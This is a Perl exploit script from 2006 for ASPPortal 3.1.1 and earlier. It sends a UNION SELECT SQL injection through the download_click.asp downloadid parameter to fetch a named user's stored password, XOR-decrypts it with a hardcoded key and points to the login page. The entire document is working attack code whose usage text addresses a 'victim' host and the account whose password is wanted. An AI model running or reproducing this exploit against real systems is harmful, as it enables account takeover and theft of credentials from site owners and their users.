#!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Original advisory: http://www.nukedx.com/?viewdoc=21 #Usage: aspp.pl <host> <path> <user> use IO::Socket; use Math::BigInt; if(@ARGV != 3) { usage(); } else { exploit(); } sub header() { print "\n- NukedX Security Advisory Nr.2006-21\r\n"; print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n"; } sub usage() { header(); print "- Usage: $0 <host> <path> <user>\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <path> -> Path to ASPPortal ex: /portal/\r\n"; print "- <user> -> Username that you want password. ex: admin\r\n"; exit(); } sub decrypt () { $lp = length($appass); $apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V"; if ($lp == 0) { die("- An error occurued\r\n"); } for ($i = 0; $i < $lp ; $i++) { $f = $lp - $i - 1; # Formula for getting character via substr... $n = substr($apkey,$f,1); $l = substr($appass,$f,1); $appwd = chr(ord($n)^ord($l)).$appwd; } print "- Password decrypted as: $appwd\r\n"; print "- Lets go $aphost$apdir$apfinal for login\r\n"; exit(); } sub exploit () { #Our variables... $apserver = $ARGV[0]; $apserver =~ s/(http:\/\/)//eg; $aphost = "http://".$apserver; $apdir = $ARGV[1]; $apport = "80"; $aptar = "content/downloads/download_click.asp?downloadid="; $apfinal = "content/users/login.asp"; $apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'"; $apreq = $aphost.$apdir.$aptar.$apxp; #Sending data... header(); print "- Trying to connect: $apserver\r\n"; $ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n"; print $ap "GET $apreq HTTP/1.1\n"; print $ap "Accept: */*\n"; print $ap "Referer: $aphost\n"; print $ap "Accept-Language: tr\n"; print $ap "User-Agent: NukeZilla\n"; print $ap "Cache-Control: no-cache\n"; print $ap "Host: $apserver\n"; print $ap "Connection: close\n\n"; print "- Connected...\r\n"; while ($answer = <$ap>) { if ($answer =~ /string: "(.*?)"]'/) { print "- Exploit succeed! Getting $ARGV[2]'s information\r\n"; print "- Username: $ARGV[2]\r\n"; print "- Decrypting password....\r\n"; $appass = $1; $appass =~ s/(")/chr(34)/eg; $appass =~ s/(<)/chr(60)/eg; $appass =~ s/(>)/chr(62)/eg; $appass =~ s/( )/chr(32)/eg; decrypt(); } if ($answer =~ /number of columns/) { print "- This version of ASPPortal is vulnerable too\r\n"; print "- but default query of SQL-Inj. does not work on it\r\n"; print "- So please edit query by manually adding null data..\r\n"; exit(); } } #Exploit failed... print "- Exploit failed\n" }#nukedx.com [2006-03-20]